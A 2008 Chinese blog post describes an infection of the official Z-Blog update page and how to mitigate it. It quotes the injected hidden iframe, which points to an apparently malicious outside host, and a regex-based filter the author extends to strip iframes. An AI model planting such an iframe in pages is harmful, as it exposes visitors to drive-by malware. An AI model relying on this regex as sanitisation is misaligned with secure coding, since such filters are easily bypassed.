博客学堂
首页>>我的博客>>zblog>> Z-Blog官方blog染毒补救方法

Z-Blog官方blog染毒补救方法

来源: 漱风斋 | 添加时间:2008-3-5 18:32:11 |   | 我要投稿 | 提问

登录后台有病毒提示的小盆友们请注意,不是因为你自己的网站感染病毒了,而是官方网站感染病毒了。

官方的自动通讯页面http://update.rainbowsoft.org/info/被加了

<iframe src=http://c.j8j8.biz/103/ width=100 height=0></iframe>,

估计是被arp了。

zblog通过/admin/c_updateinfo.asp这个页面与官方进行通讯,过滤代码仅仅使用了一段script的过滤正则表达式,如下

objRegExp.Pattern="<script.*/*>|</script>|<[a-zA-Z][^>]*=['""]+javascript:\w+.*['""]+>|<\w+[^>]*\son\w+=.*[ /]*>"

补救方法:

1、通知zblog管理员清除病毒

2、修改过滤代码:

objRegExp.Pattern="<script.*/*>|</script>|<[a-zA-Z][^>]*=['""]+javascript:\w+.*['""]+>|<\w+[^>]*\son\w+=.*[ /]*>|<iframe.*/*>|</iframe>"
收藏和分享:
评论加载中…
网站地图 - 关于我们 - 版权声明 - 广告服务 - 联系我们 - 诚聘英才 - 帮助中心
Copyright © 2007-2008 www.blog286.com all Right Reserved
博客学堂 版权所有